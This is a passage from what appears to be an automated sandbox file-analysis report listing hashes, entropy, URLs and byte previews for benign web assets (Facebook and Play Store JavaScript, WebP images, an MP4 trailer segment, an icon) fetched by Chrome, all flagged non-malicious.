                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_ember_auto_import_=self.webpackChunk_ember_auto_import_||[]).push([[26],{71026:function(e,t,n){n.r(t),n.d(t,{environment:function(){return a},eventRecorder:function(){return F},immediateEventRecorder:function(){return q},logger:function(){return D},network:function(){return E},setEventQueuePostIntervalEnabled:function(){return N}}).var s=n(76588),r=n(24178),u=n(32722),o=r.SC.attachDelegate,a={setDelegate:function(e){return o(this,e)},globalScope:function(){return window}},i={AJAX:"ajax",AJAX_SYNCHRONOUS:"ajaxSynchronous",IMAGE:"image",BEACON:"beacon"},v=r.vc.metricsDisabledOrDenylistedEvent,c=r.vc.removeDenylistedFields,l={},p=["dsId","consumerId"].function f(e,t,n){var s=null.return n&&!v.call(u.Z,n.eventType,t)&&(c.call(u.Z,n,t),m(t,n),e.apply(null,Array.prototype.slice.call(arguments,1)),s=n),s}function d(e,t){l[e]=l[e]||{},l[e]=t}function Q(){l={}}function m(e,t){l[e]=l[e]||{},l[e].anonymous&&p.forEach((function(e){delete t[e]}))}var y=r.SC.attachDel
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ISO Media, MP4 Base Media v5
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):897
                                                                                                                                                                                                                                  Entropy (8bit):3.2951635949001163
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:jOj47S4xXSk7t+XckfEtlwhScxGg+ROGeYIuUjilfI10I+QBld3:jOk7S4gnEtlwhSc/+RGutfI1JdBl
                                                                                                                                                                                                                                  MD5:AB1C20B6AC28699FEC5D8C2C79F9571D
                                                                                                                                                                                                                                  SHA1:363CB7FC8A16A5CCA9F2D9C2FE4A5E23C70D8DA1
                                                                                                                                                                                                                                  SHA-256:4198F33088B2447D2FC20685241F4D3EB9EA5D7D21F7F856D8866A20D1575C04
                                                                                                                                                                                                                                  SHA-512:7640423FA1248CF5236322058D0EB223DC28E61AE77D988A17A175A28223B1DD464190AF768862006A3EF052522903207A91EB157863FC648806EA3B8005279C
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://apptrailers.itunes.apple.com/itunes-assets/PurpleVideo221/v4/14/d0/cf/14d0cf5e-72c7-1df3-011c-650969172076/P875466468_Anull_trickPlay_gr230_sdr_398x862-.mp4:2f81d12815ca91:0
                                                                                                                                                                                                                                  Preview:....ftypiso5....isomiso5hlsf...emoov...lmvhd......J..J..u0....................................................@..................................xtrak...\tkhd......J..J............................................................@........^......mdia... mdhd......J..J..u0....U......1hdlr........vide............Core Media Video.....minf....vmhd...............$dinf....dref............url .......{stbl.../stsd............avc1...........................^.H...H...............................................1avcC.d......'d...R0d.z.............{. ...(......a4snf.............................................................................................colrnclx...........fiel......chrm......pasp............stts............stsc............stsz................stco...........Qudta...Iswre....U.mediafilesegmenter: Version 1.20.4 (618.16ib-230418) Linux....(mvex... trex........................
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (878)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1441
                                                                                                                                                                                                                                  Entropy (8bit):4.923625217494772
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:ildT+lZadfID4P9Gpl3fBzR1SQLA2RAMRMT6XFKg/7/GpSw8G9bFw4YZn:ild2ZbI9GpvRQQ82OUugFKg/7/Gpj8Gw
                                                                                                                                                                                                                                  MD5:188415311B33E9DFC79C3CC6147ED47D
                                                                                                                                                                                                                                  SHA1:486B072C15EA89B3D39F607F92327F1A338254B0
                                                                                                                                                                                                                                  SHA-256:8B3DA2AC016CE7C6F38F10052C50C7958935276BD5885009716FEC7B3D8ED681
                                                                                                                                                                                                                                  SHA-512:DD95C297899B58507824F3A3129E060BBA8A9F7D2045526DC66DAB584D19571069D84EB2591B7FBE71A0FBA96DD1BE1A32995184D37FCA9A1F699FC71739644B
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_ember_auto_import_=self.webpackChunk_ember_auto_import_||[]).push([[356],{84356:function(t){var o="touch".function s(t,o){this._target=t||document.body,this._attr=o||"data-focus-method",this._focusMethod=this._lastFocusMethod=!1,this._onKeyDown=this._onKeyDown.bind(this),this._onMouseDown=this._onMouseDown.bind(this),this._onTouchStart=this._onTouchStart.bind(this),this._onFocus=this._onFocus.bind(this),this._onBlur=this._onBlur.bind(this),this._onWindowBlur=this._onWindowBlur.bind(this),this._bindEvents()}var n=s.prototype.n._bindEvents=function(){this._target.addEventListener("keydown",this._onKeyDown,!0),this._target.addEventListener("mousedown",this._onMouseDown,!0),this._target.addEventListener("touchstart",this._onTouchStart,!0),this._target.addEventListener("focus",this._onFocus,!0),this._target.addEventListener("blur",this._onBlur,!0),window.addEventListener("blur",this._onWindowBlur)},n._onKeyDown=function(t){this._focusMethod="key"},n._onMouseD
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (502)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1596
                                                                                                                                                                                                                                  Entropy (8bit):5.581511846844705
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:kzJvWUV3kUmlVf/Uc5mXwbPZn/ewqOBO5rZzj/bEaUUS3ybEvoPi2knprl:kZX3iPD5KwNUzHzUoQiHkprl
                                                                                                                                                                                                                                  MD5:1BAE47B458FFBC6DF728A280FF5E0131
                                                                                                                                                                                                                                  SHA1:E4D48A12E4D8D6E4DFD4A42EB967E9FE23F281E0
                                                                                                                                                                                                                                  SHA-256:BCBA348F5ECBA6A3FD5BAC662C18A6459147FF218E80D2C8CE6159A08778C301
                                                                                                                                                                                                                                  SHA-512:1883B907077CB660FF1D99D64BC4F38617A918781D5061EA363972E3E0B6FBE13F96F7D89E47459BE2B933548CDA94EF703A4E6CFA102E0AB6A6AAC529847550
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:"use strict";this.default_PlayStoreUi=this.default_PlayStoreUi||{};(function(_){var window=this;.try{.var WRc,XRc,YRc,ZRc;._.$Rc=function(a,b){var c=a.Aa;const d=a.lb,e=a.Sp;var f=_.P;a=a.qa;var g=_.P;b.Kd.H()===2?(c=c.H(),b=(0,_.P)('<div class="'+_.T("ex4AWb")+'"><div class="'+_.T("oVP4Cb")+'">'+WRc(b,e)+'</div><div class="'+_.T("OI7HUe")+'"><div class="'+_.T("zri8D")+'">'+XRc(e)+YRc(b,e)+"</div>"+ZRc(b,d,c)+"</div></div>")):(c=c.H(),b=(0,_.P)('<div class="'+_.T("ex4AWb")+'"><div class="'+_.T("oVP4Cb")+'"><div class="'+_.T("aELZ1d")+'"></div>'+WRc(b,e)+'</div><div class="'+_.T("OI7HUe")+'"><div class="'+_.T("zri8D")+.'">'+XRc(e)+YRc(b,e)+"</div>"+ZRc(b,d,c)+"</div></div>"));return f(_.$W({qa:a,body:g(""+b)}))};WRc=function(a,b){a=""+_.jX(a,500,280,void 0,b.H(),"Rd7OUe",void 0,void 0,(0,_.Jo)('style="max-height: '+_.T(_.$o(280))+'px"'));return(0,_.P)(a)};XRc=function(a){return(0,_.P)('<h2 class="'+_.T("J7tk9b")+'">'+_.Q(a.Ja())+"</h2>")};YRc=function(a,b){a=""+_.HX({href:(0,_.Io)(""+_.
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):90462
                                                                                                                                                                                                                                  Entropy (8bit):7.976966393333891
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:05GnkNveINsxitIW2ld1S3b71IQb3xRvc45JlNE2nskaunTsX:05oasxitIdd4lbhZrJY2nPaKTe
                                                                                                                                                                                                                                  MD5:9242E084DEEAAEEE9A7DFC679B51E9CD
                                                                                                                                                                                                                                  SHA1:891D6A2F63AD389C0BE6B690F27FC8BEC7ED251D
                                                                                                                                                                                                                                  SHA-256:F528C0546EFA7DC973F8878D23F8975984C2673D9ACD8FAF141A846623F8273B
                                                                                                                                                                                                                                  SHA-512:477C7851CEE450ADE6FE833C9B3EBBCF427203B56A80A432B86EBEEDB0B62F743A7007C656303C9DAA7F28CEF533F7BC9B302EF32A183ADE7EE0C2847623EDC3
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://play-lh.googleusercontent.com/npHAHmtZRgiMVEVg5pcncTIyqMW5MX--niR0L9PSzc5l8nuXS4GbU4w0yumQTururnc=s256-rw
                                                                                                                                                                                                                                  Preview:RIFFVa..WEBPVP8X..............VP8L.a../..?.MHl.H.....;..?....".?.$.@.If.b.6I.i.:...X.. ..8.x.Qg ...u.|U.....fZ..W?.5.........2K..~}/.T.....v~.m..e).+.o]...Q.......O.xB.Z.-?.?.m..~.j....$.../...K.........[.$........|..j...[.!.<7.'..+.[.......]..K(...U.2...s(6..^.....p?o[...8.....u..G......I../.$.......I.".....5....s.w/.k ........hl.}aI..h....k.P.".dn0..V].I6-Py.[..$...P..T.n$I......bz...EP..i.........l..I..x.....F.<..9....&..:.4.H#B..t(@...5....Z9.t...$Q2(..._..6J.x.......G....nT....:uB..i...a..!..N...}`7.s....h(;'.....T4..6.6X..!...(.FS.;.s{..3..;.....*.s..q..WC.~.{u;<._./...B..~...%.......l.q...~._...Q....i.|.P.....`...H.t..c!.a/.G.G<)....4.3.N..j&u.&........6.{.......N....z..u&.Ssrj'.4.7.....b.Zp...`aa.....~.....Y7..b.G;.c...+Oy.......h........Y.I[.OTJ..P.Q.....,...c..F_.....x.L..>..k.y(U.q...=...-..r....:..5...T....I...8.l.M.O...<.rQ.q. ...;&]....N...1....}i.....)@Qc`..d.9.........,....w..N.....y)....9p...G..j.p.>...qy.d.U..`=s!nO.....p
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (5717)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):67930
                                                                                                                                                                                                                                  Entropy (8bit):5.350281148314441
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:9HDLotdWvrV8YctZCUmeTVxETDGjTHvoKNU28W3Bq9eW5:VDLotdWvrV8YctZCUiTDYDvoKNUExqb
                                                                                                                                                                                                                                  MD5:F16C089BF22C5A3450A3B941D8D1D3B3
                                                                                                                                                                                                                                  SHA1:6543253FE5800826256E7F0900D6BE807ED82DE2
                                                                                                                                                                                                                                  SHA-256:0FB7810E3D1EEAC1CA74723786D499CFB6CE9E7C2942F0959F13D6F5A935736A
                                                                                                                                                                                                                                  SHA-512:ABD13F038E07C841551DDC35C40BAD7E6A1A7B2351A70A6EFB2A9B538C159A26524C21D2B5DF0EFF9D619A2709EB4D5E0EE10025B79BE6E88F95C7F420D9F57A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://static.xx.fbcdn.net/rsrc.php/v3iluz4/y2/l/en_GB/MvRHUS1G-cc.js
                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("BrowserScroll",[],(function(a,b,c,d,e,f){function a(){var a;return window.pageXOffset||((a=document.documentElement)==null?void 0:a.scrollLeft)||((a=document.body)==null?void 0:a.scrollLeft)||0}function b(){var a;return window.pageYOffset||((a=document.documentElement)==null?void 0:a.scrollTop)||((a=document.body)==null?void 0:a.scrollTop)||0}f.getPageScrollLeft=a;f.getPageScrollTop=b}),66);.__d("StickyController",["CSS","Event","Style","Vector","queryThenMutateDOM"],(function(a,b,c,d,e,f){a=function(){"use strict";function a(a,b,c,d){this._element=a,this._marginTop=b,this._onchange=c,this._proxy=d||a.parentNode,this._boundQueryOnScroll=this.shouldFix.bind(this),this._boundMutateOnScroll=this._mutateOnScroll.bind(this)}var c=a.prototype;c.handleScroll=function(){b("queryThenMutateDOM")(this._boundQueryOnScroll,this._boundMutateOnScroll)};c.shouldFix=function(){return b("Vector").getElementPosition(this._proxy,"viewport").y<=this._marginTop};c._mutateOnScroll=fun
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 395x296, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):37912
                                                                                                                                                                                                                                  Entropy (8bit):7.994395927835498
                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                  SSDEEP:768:nZmTYtorWZ8SfDb1frUxnADCh54zfaQ/EoxCjZoyZLdVph5oj/:nZSYtycDZonhh54zfaVjRZ5VD27
                                                                                                                                                                                                                                  MD5:9412333F64366A0DE0D4627CA7621438
                                                                                                                                                                                                                                  SHA1:C0B9A4AA7A050CDD7CD6D1677050650CB2848584
                                                                                                                                                                                                                                  SHA-256:4B31A4DF1829C4B2C7B545AFEA87A84FFBBAFA01DB8A9F404E5BEA8E7344E2EA
                                                                                                                                                                                                                                  SHA-512:2EA6C5566DEB497423D2BEDC517EB8A455979C1E82FB9285A70EA97F51C673C646E8D95CF8C762B732C1E8952D66B5004FC51F2CBB1B55CE49E34F7EDDEF876B
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://play-lh.googleusercontent.com/-2j2BAdv613PP-EaFA-H9Oczwgljn4rRgotfLmIYMLIMRp3p_bG7gQIfBCXk1m_wiRQ=w526-h296-rw
                                                                                                                                                                                                                                  Preview:RIFF....WEBPVP8 ....0x...*..(.>y,.F..!.49.....j...h.i.3#./......7...}../..pv..7.._..?....}....sz..........w.G..._P.._.o...2.......w.'.c.w...../.........?..i.....G....S..z...._......[.[.}~...7...?..#...-..._....a.;...G.?.z...h.......;..................C.._p......~j~..E......................._..,.......o.'./........~...W...g.............w...K./.....e.g..2........./. ...C@...pf....R$..G..f."..`Js...|FN]~...Q..E...wA...P(g..m...b....Vp.O.}+.L.q.....O.Wo|[[- ..g+bC.z0Yw.8O.....x....C..#J,.....G....|...<.3=.'.B..?4c...]A,.~|...1..1....[{..|.....;...b..w*..N...6..W-5.p.w..v%.7~..*P.!S.G.|!..B.....w)..i..h.F_...'|....`.)... ;."$....T....`.*.&.X....&B7$...'.%eh...F$..L..@....Itg..._..... q....a..#E...J........7...B.......}A...J....W......*................: s.t.GMLADU.z...Hx....41.c......o.^.Fi'.....j.=....K.8m..."....c+....L......=.'..a......p..q....r..3.0i..yO...lcO....bh.g.y.A.....S.>.G_..........!.r"u.{.dy.t. ..n. .:.a..i.~...8....!..4..:DS.kf|q..1.@M
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (8096)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):55228
                                                                                                                                                                                                                                  Entropy (8bit):5.329308796986016
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:c3Rf8me01IhZaorAIZu42ZlJZ4Us/Hlybpypdagqf:ixe0IZu1D4jvlybn
                                                                                                                                                                                                                                  MD5:614AF3AA20EF61E30C3FFE0C88FE61DA
                                                                                                                                                                                                                                  SHA1:48018D5135B84EF010A2C228C5F4411BE8597357
                                                                                                                                                                                                                                  SHA-256:66ED8A76E009F2492B61ABC94BB5A4F0867B60CB397057B4E8A5905AFD9412E2
                                                                                                                                                                                                                                  SHA-512:4D9B3D7DF01A2621141775DE8BD58FD43D38AF88598E6A8F14DC0E0DA4A3F900BB5B963826D37D1EBBAE24CC1D4F1026AADCC6184427323EF1D25D48A46101B1
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://static.xx.fbcdn.net/rsrc.php/v3/y3/r/Ja35YE72DAb.js
                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("AdsObjectTypes",[],(function(a,b,c,d,e,f){a=Object.freeze({ACCOUNT:"ACCOUNT",ADGROUP:"ADGROUP",AUDIENCE:"AUDIENCE",BUSINESS_ACCOUNT:"BUSINESS_ACCOUNT",CAMPAIGN:"CAMPAIGN",CAMPAIGN_GROUP:"CAMPAIGN_GROUP",CREATION_PACKAGE:"CREATION_PACKAGE",CREATIVE:"CREATIVE",HISTORY:"HISTORY",OPPORTUNITIES:"OPPORTUNITIES",PIXEL:"PIXEL",PRIVACY_INFO_CENTER:"PRIVACY_INFO_CENTER",TRANSACTION:"TRANSACTION",MESSAGES:"MESSAGES"});f["default"]=a}),66);.__d("AdsALSubsurface",["AdsObjectTypes"],(function(a,b,c,d,e,f,g){"use strict";var h=(f={},f[c("AdsObjectTypes").CAMPAIGN_GROUP]="campaign",f[c("AdsObjectTypes").CAMPAIGN]="adset",f[c("AdsObjectTypes").ADGROUP]="ad",f);function a(a,b){return a+":"+b}function b(a){var b;if(a==null)return;return(b=h[a])!=null?b:a.toLowerCase()}function d(a){return a}function e(a){return a==null?"":a}g.getFullSurfaceString=a;g.getAdsObjectTypeSubsurface=b;g.getAdObjectLevelSubsurface=d;g.getDynamicSubsurface=e}),98);.__d("Currency",["CurrencyConfig"],(funct
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (690)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):10455
                                                                                                                                                                                                                                  Entropy (8bit):5.615010750732318
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:NVS6GBVw8QUwEG/AHGaYWZXtx1HiqJdep13BVw0V0Nw/GTFGaQxiG1nm9J6Hfyq4:NV0+8UEzltDH5d8+0VL/+EmX6HfnER
                                                                                                                                                                                                                                  MD5:1844A53C8725B324A514802035A44AD6
                                                                                                                                                                                                                                  SHA1:032195AF46F75BD81F342F5C484C09EE4D2E9810
                                                                                                                                                                                                                                  SHA-256:5A8D6109F005C434DE79A534D85C214198FB4A6D4BD82F09A022CF82B6562138
                                                                                                                                                                                                                                  SHA-512:CB855E393BFC6F4CEEC2F9FD007E6B792926D173857E8B9A1191859B5A7E550A2E12A9794F32DDBE7381376E95DD46C2C6AA169C217AF0B700FAEE0012B40B4A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:"use strict";this.default_PlayStoreUi=this.default_PlayStoreUi||{};(function(_){var window=this;.try{._.$rc=function(a){return(0,_.P)(a!=null&&a.N()>0?'<div class="'+_.T("pf5lIe")+'">'+_.Zrc(a.N(),"L0jl5e bUWb7c","vQHuPe bUWb7c",a.H())+"</div>":"")};._.Zrc=function(a,b,c,d){var e=Math.floor(a);d='<div aria-label="'+_.T(_.nZ(d??""+a))+'" role="img">';const f=a-e;e=Math.max(0,Math.ceil(e));for(let g=0;g<e;g++)d+='<div class="'+_.T(c)+'"></div>';d+=f>0?'<div class="'+_.T(b)+" "+_.T("cm4lTe")+'"><div class="'+_.T(c)+" "+_.T("D3FNOd")+'" style="width: '+_.T(_.$o(f*100))+'%"></div></div>':"";a=Math.max(0,Math.ceil(5-Math.ceil(a)));for(c=0;c<a;c++)d+='<div class="'+_.T(b)+'"></div>';return(0,_.P)(d+"</div>")};._.J5=function(a,b){return"\u0411\u044b\u043b\u043e "+a+", \u0441\u0442\u0430\u043b\u043e "+b};._.BGc=function(a,b,c){return(0,_.Jo)(c?'jslog="'+_.T("38052; 1:223|"+_.AW(b.H()))+'; track:click,impression"':'jslog="'+_.T("36906; 1:"+(a+"|"+_.AW(b.H())))+'; track:click,impression"')};_.CGc
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):8672
                                                                                                                                                                                                                                  Entropy (8bit):7.9657826197851955
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:QxhfN+RkTxzurpYeoEkYqelM0WxpjQyyd5P8nJZpqhnCh7e6:QXN5zuOekYbbWxRQld5PsZQhnEt
                                                                                                                                                                                                                                  MD5:4CEA15C604E63D3E7537324F34811098
                                                                                                                                                                                                                                  SHA1:FCE3E1380CF11F7F3318D857BC9E4BAEE82D89FA
                                                                                                                                                                                                                                  SHA-256:653EEE6AA0AE78CD5EF4FD2E3897D198A5422CC5F63F1F667ECEBBE692AAB019
                                                                                                                                                                                                                                  SHA-512:6C3E0893561B7AB8474A3E526EED9B5503721B14275E0641351577D06AC60CD7B97A5F70107DB1D2B5FF682C57573A6E3F71A290B0000E0D522A407085BBB5CD
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://play-lh.googleusercontent.com/9KAPlokfzeEFb34Mwm7juoiC5-yjpf4JlRLguuAgn5fV7JcTECwJnu6guLxbaZBWDA=s64-rw
                                                                                                                                                                                                                                  Preview:RIFF.!..WEBPVP8X........?..?..VP8L.!../?.....n.."..#..UA...gC&../.*.#...X$_..N[.X8.l.v.z.mk.......>.`.I..y-.8.# .@..5....$........_kg.?.~..O..2...@.!.&.(t.\Q.;Q......b..yA.b...f.b.."SH)MPZ...P.dEV.y.._s..j>U.4..U}XR.:..Ws..U..3.....{Z..*4.b-.J..g..r...P...?.!"&@...N.#.Q@..`.v33........@...-/!..l!J..3'....)~...v..te:r..'......1.03....t?]Z.e....o.rCI.$..........y.0.4....4.N.....{.t..H....Zz....i..$...v..2&.....\K[.....M*I..\..j.m.6.m...k.NR.B.*G..=...{..hwg.YC.v....l~BO..m..lw.{d.....i.m;.S...&. ip..,0u.-.........L..]:..u.@....\.u../l..I..<..8...kZc...Z...Z.m..v-.ms.rufVfD..._L..Z..e.9..j.....dP".*.9..g.3g-.....\...+.]..m[U.y.}....i.R......."..H..h...6.....ev.9..;,?..'...7?.?.....). ..(.(@$@.@..W..0k.......m.*.X..c.......Rx.1L@.@.D.. 6..A.*.XV........b.YD....0=...j..6.<.(@.....".p.qj.V...:.}...8..K!.-$1*.. ...._.W.t ...4.....>.b.T..Y..m....L..d.....S.!.@P..KRAc..g..*. Ra2........o...zl....XN..>h..\d..F.Fn...i$.fI.i(.<.q:~u...jB..$A...Wk.XU}.
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):8934
                                                                                                                                                                                                                                  Entropy (8bit):7.965182039570643
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:3Z4s2q5VJRFFUJiGVshwmt+HuYt9r9otSEVEG5WPyhwuv:pzH5VJDFyissTEHNtAt/xOyZv
                                                                                                                                                                                                                                  MD5:64B028ABB91D25F47EAEA97E508222F3
                                                                                                                                                                                                                                  SHA1:3D02DF29E5484325376EE870196B28BB94611707
                                                                                                                                                                                                                                  SHA-256:0AED9BAD4388F2885A581E6FF389A157ED4AB1880A0C4D17DA70B8AD8CFBFFA7
                                                                                                                                                                                                                                  SHA-512:9510924B8FD97D15FAABDF99E0DEF9F4FF88A200122D8823BF5F49B1DBCB373C0C621E1A85A4AE3838DF6E47AE936D613A354C1D10C99C291E7BF782D3842D89
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://play-lh.googleusercontent.com/DZtnSdEJ1VyGYxzK18Ky0dsC3ILexQDDsC-V1r4AQxrv3dNEiLgbCQQTdK9XQ69HF7RS=s64-rw
                                                                                                                                                                                                                                  Preview:RIFF."..WEBPVP8X........?..?..VP8L."../?...M0h.H..................-...[..8$.#.VN.[;..$9.l.Q..0gh.6...$%..=..?:..F...pw.?.....q.....~.~G>.S...WG..........U...%.$....k.{.S"P.V...V...T.......lG.......U....0.'.8B.....w....$0...x$m..S.r...J.m.c..o.m.m.=..S..v.U1...7.h[[.H.u]7D..Vf..........9bf.'......1C33w..z....J.e.%[.E.....&E.$....GDfVeU..,.<+..I...,.t.333j'1.....3..U....nf....Pg.S...!\G.ex...{..?"...#w\...zi.>..Se.{f.Lev..(..,h.r.fkdTQ.....3i)=.U...vWx]DO.Gy.&..........:.E..:....+....&..:...S.....D!.#..&.....Z.9.....L..6.mr.z..?...rQ..g( $...p.aY.^M.h.. ..u.;q$N.VeN..a.....f,m..S..........hAv.....A..........v#d.sd. ...)..H<b.H....e...c.F.%....@c. P...i`+..FKh+..)R.8.N..m.u.A..!@"...Z.*...).ET2Sb..c9..'&..........8.$(....-(.A..Z%..Xc...j..ua..@..e.[.dY.<.0.Dh.I=e#..+..X(38^.......i....3...n.y.4....j.& V...Z..N.uc.p..\.....X6..* .;Qn./..-.....;..e...z..*....r...3-H..bI".'..e>a., ...@...c.e.=...0..xd<..r.....[.c.D..$.."J.H6..N...X.|4...tKn.t..Y.G.<w
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):4286
                                                                                                                                                                                                                                  Entropy (8bit):4.933290584110762
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:5+8ItBBBuxc+6QQQQQiRRRRRRRRRRJJO9P111118B:1cjRRRRRRRRRRi90
                                                                                                                                                                                                                                  MD5:8CDDCA427DAE9B925E73432F8733E05A
                                                                                                                                                                                                                                  SHA1:1999A6F624A25CFD938EEF6492D34FDC4F55DEDC
                                                                                                                                                                                                                                  SHA-256:89676A3FB8639D6531C525E5800FF4CC44D06D27FF5607922D27E390EB5B6E62
                                                                                                                                                                                                                                  SHA-512:20FBEE2886995C253E762F2BB814AD16890B0989DEAB4D92394363EF0060B96A634D87C380C7BA1B787A8AB312BE968FED9329A729B4E0D64235A09E397DB740
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:...... .... .........(... ...@..... ......................................................................e.G.c.......................d...c...e.G.............................................................................j...f...f...f...e.......................f...f...f...g...f...j...........................................................m$..j...i...h...h...h...h.......................h...h...h...h...h...i...j...m$..............................................j...j...j...j...j...j...k...j.......................j...k...j...k...k...k...k...l...u.......................................q.-.n...m...l...m...l...l...m...l.......................l...m...l...m...m...m...m...m...n...q.-.............................u...p...o...o...o...o...o...o...o...o.......................o...p...o...p...p...o...p...o...o...p...u........................$..r...r...q...q...q...q...q...q...r...q.......................r...q...r...q...q...r...q...r...r...q...r....$..................v...t...t...t...t...t...t...t...t
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):200
                                                                                                                                                                                                                                  Entropy (8bit):6.878063612294382
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:wAi1Z6iB1toFkCoH+GN2jQPRwS9gJY5derhz6:wd1Eqt8qNN2jaRxgJY5Ec
                                                                                                                                                                                                                                  MD5:26AE874F3B7051BC5B112960C251080F
                                                                                                                                                                                                                                  SHA1:1D6B38F7FE58DC79CC66CC0A3EE42CAAA096B686
                                                                                                                                                                                                                                  SHA-256:8C66B3CB207515328AC21BDBBDA1B90A74D7CAC66267352048BFD7E4E1EFE627
                                                                                                                                                                                                                                  SHA-512:88DBFE63B9A7374528308BD4AC891535C310FFC2277C3A44004772ACCEA7115D8A1DF77ECB56EDF573000DF4AFC79E7E9524B4FB8C8E8DBAC2384860306F0C31
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:RIFF....WEBPVP8L..../....58l.F....._..2.. .p[[..L.nx.......!V.....R..A...........x....>b.z[..j{....%~.{..~+N.sUy.G.....D...x.poN...,`....>....o...Z.*....u...,}...^..W...v..Z.u..^.`dg`j.|...q....
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (35297)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):146544
                                                                                                                                                                                                                                  Entropy (8bit):5.693066609916641
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:xjMLI23A/RkX4CMMMx4wySAWh/fH6i4mpsWyE96PatWf1atHp:xjMLI23A/RkJOyjiTWf1ar
